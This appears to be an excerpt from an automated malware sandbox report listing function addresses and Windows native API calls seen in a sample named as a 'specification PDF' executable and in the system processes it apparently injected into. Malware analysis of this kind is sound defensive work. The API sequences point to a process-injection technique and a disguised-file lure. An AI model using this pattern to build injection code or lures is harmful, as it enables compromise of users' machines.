              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EC0 NtQuerySection,1_2_03C72EC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72ED0 NtResumeThread,1_2_03C72ED0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E80 NtCreateProcessEx,1_2_03C72E80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E50 NtCreateSection,1_2_03C72E50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E00 NtQueueApcThread,1_2_03C72E00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DC0 NtAdjustPrivilegesToken,1_2_03C72DC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DA0 NtReadVirtualMemory,1_2_03C72DA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D50 NtWriteVirtualMemory,1_2_03C72D50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CD0 NtEnumerateKey,1_2_03C72CD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CF0 NtDelayExecution,1_2_03C72CF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C50 NtUnmapViewOfSection,1_2_03C72C50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C10 NtOpenProcess,1_2_03C72C10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C20 NtSetInformationFile,1_2_03C72C20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C30 NtMapViewOfSection,1_2_03C72C30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C738D0 NtGetContextThread,1_2_03C738D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73C90 NtOpenThread,1_2_03C73C90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73C30 NtOpenProcessToken,1_2_03C73C30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D23540 NtSetContextThread,1_2_04D23540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D23850 NtSuspendThread,1_2_04D23850
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D23B60 NtResumeThread,1_2_04D23B60
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2CF0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2C30 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2D10 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2E50 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2F00 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB29F0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2A80 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2AC0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2A10 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2B90 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2B80 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2BC0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2B10 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2B00 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB34E0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB4570 NtSuspendThread
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB4260 NtSetContextThread
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2CD0 NtEnumerateKey
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2C20 NtSetInformationFile
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2C10 NtOpenProcess
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2C50 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2DA0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2DC0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2D50 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2EB0 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2E80 NtCreateProcessEx
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2ED0 NtResumeThread
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2EC0 NtQuerySection
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2E00 NtQueueApcThread
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2FB0 NtSetValueKey
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2F30 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB29D0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2AA0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2BE0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB2B20 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB3C90 NtOpenThread
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB3C30 NtOpenProcessToken
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB38D0 NtGetContextThread
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_0493EF68 NtQueryInformationProcess,NtReadVirtualMemory
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04943548 NtSetContextThread
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04944564 NtMapViewOfSection
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04944718 NtMapViewOfSection
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04943E78 NtQueueApcThread
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04943858 NtSuspendThread
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04944928 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04943B68 NtResumeThread
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00386606 CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0037ACC5 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003879D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0036B043
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00353200
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00353B70
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0037410F
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003602A4
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0037038E
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0034E3E3
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0037467F
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003606D9
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003AAACE
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00374BEF
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0036CCC1
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00346F07
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0034AF50
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0035B11F
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003A31BC
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0036D1B9
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0036123A
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0037724D
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003493F0
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003813CA
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0035F563
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003496C0
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0038B6CC
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003477B0
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003AF7FF
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003779C9
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0035FA57
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00347D19
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0035FE6F
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00369ED0
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00347FA3
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_020E35F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004185A3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E0D7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004010E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E0E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402240
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040441A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402540
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FD5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FD63
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042ED93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402EF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FF83
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041678E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416793
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040DF93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C02245
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0010E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C300A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEE076
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF6757
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4A760
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C42760
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA6C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40680
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C64670
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5C600
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0A526
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40445
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB4BC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40B10
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFEA5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFCA13
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3E9A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFE9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C428C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C56882
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C26868
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E810
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C46FE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFEFBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4CF00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C32EE8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF0EAD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C82E48
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C60E50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0E6D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C52DB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40D69
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C58CDF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0ACEB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEEC4C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF6C69
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFEC60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30C12
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4AC20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBEC20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C31380
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFF330
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2D2EC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF124C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C451C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5B1E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C8717A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2F113
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDD130
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4B0D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF70F1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7508C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB36EC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFF6F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CED646
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDD62C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFF5C9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF75C6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAD480
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7DB19
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFFB2E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFFA89
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5FAA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C859C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C099E8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF18DA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF78F3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB98B2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C49870
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5B870
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB5870
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFF872
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C43800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF1FC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBFF40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFFF63
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF9ED2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C41EB2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C49DD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDFDF4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF7D4C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFFD27
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC7CE8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5FCE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD9C98
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C43C60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D1E6A9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D252EC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D1E288
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D1E3A4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D1D808
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 2_2_032B43A4
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 2_2_032B46A9
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 2_2_032B4288
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 2_2_032BB2EC
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 2_2_032B3808
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B80445
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C4A526
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3A6C0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B80680
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B7C6E0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B9C600
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BA4670
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C36757
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B8A760
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B82760
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B700A0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C2E076
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C4010E
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B42245
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B8E310
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C4ACEB
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B98CDF
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C2EC4C
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B8AC20
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BFEC20
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3EC60
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B70C12
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C36C69
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B92DB0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B7AD00
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B80D69
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B72EE8
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C30EAD
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C20E6D
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BA0E50
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BC2E48
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B86FE0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3EFBF
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B8CF00
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B96882
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B828C0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BAE810
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B66868
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C20835
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B7E9A0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3E9A6
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3EA5B
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3CA13
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BF4BC0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B80B10
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BED480
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C375C6
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3F5C9
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3F6F6
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BF36EC
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B416CC
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C2D646
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C1D62C
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C370F1
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BB508C
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B8B0D0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B9B1E0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B851C0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B6F113
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BC717A
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C1D130
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B6D2EC
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3124C
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B71380
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3F330
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C07CE8
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B9FCE0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C19C98
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B83C60
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C1FDF4
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B89DD0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C37D4C
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3FD27
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B81EB2
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C39ED2
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C31FC6
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3FF63
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BFFF40
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BF98B2
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C318DA
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C378F3
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3F872
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B83800
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B89870
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B9B870
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BF5870
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B499E8
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BC59C0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04B9FAA0
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3FA89
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04BBDB19
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_04C3FB2E
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_0493EF68
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_0493E6A9
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_0493E288
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_049452EC
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_0493E3A4
Source: C:\Windows\SysWOW64\newdev.exe | Code function: 3_2_0493D808
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C75050 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CBEF10 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C2B910 appears 272 times
